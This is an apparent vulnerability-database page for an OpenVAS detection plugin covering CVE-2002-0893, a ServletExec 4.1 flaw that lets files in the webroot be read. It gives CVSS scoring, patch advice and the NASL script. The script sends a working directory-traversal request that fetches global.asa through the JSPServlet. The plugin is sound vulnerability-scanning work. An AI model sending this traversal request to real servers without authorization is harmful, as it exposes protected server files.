Lucene search
Copyright (C) 2002 Matt MooreOPENVAS:136141256231010959HistoryNov 03, 2005 - 12:00 a.m.
ServletExec 4.1 ISAPI File Reading
2005-11-0300:00:00
Copyright (C) 2002 Matt Moore
plugins.openvas.org
19
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
6.5 Medium
AI Score
Confidence
Low
0.006 Low
EPSS
Percentile
79.1%
By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)
# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10959");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_cve_id("CVE-2002-0893");
script_name("ServletExec 4.1 ISAPI File Reading");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2002 Matt Moore");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");
script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");
script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)");
script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
are returned. Text files can generally be read without problem.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
port = http_get_port(default:80);
# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if(!res)
exit(0);
if("OBJECT RUNAT=Server" >< res) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Related
cvelist
cvelist
CVE-2002-0893
2002-08-31 04:00:00
nessus
nessus
nvd
nvd
CVE-2002-0893
2002-10-04 04:00:00
openvas
openvas
ServletExec 4.1 ISAPI File Reading
2005-11-03 00:00:00
cve
cve
CVE-2002-0893
2002-10-04 04:00:00
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
6.5 Medium
AI Score
Confidence
Low
0.006 Low
EPSS
Percentile
79.1%
Related for OPENVAS:136141256231010959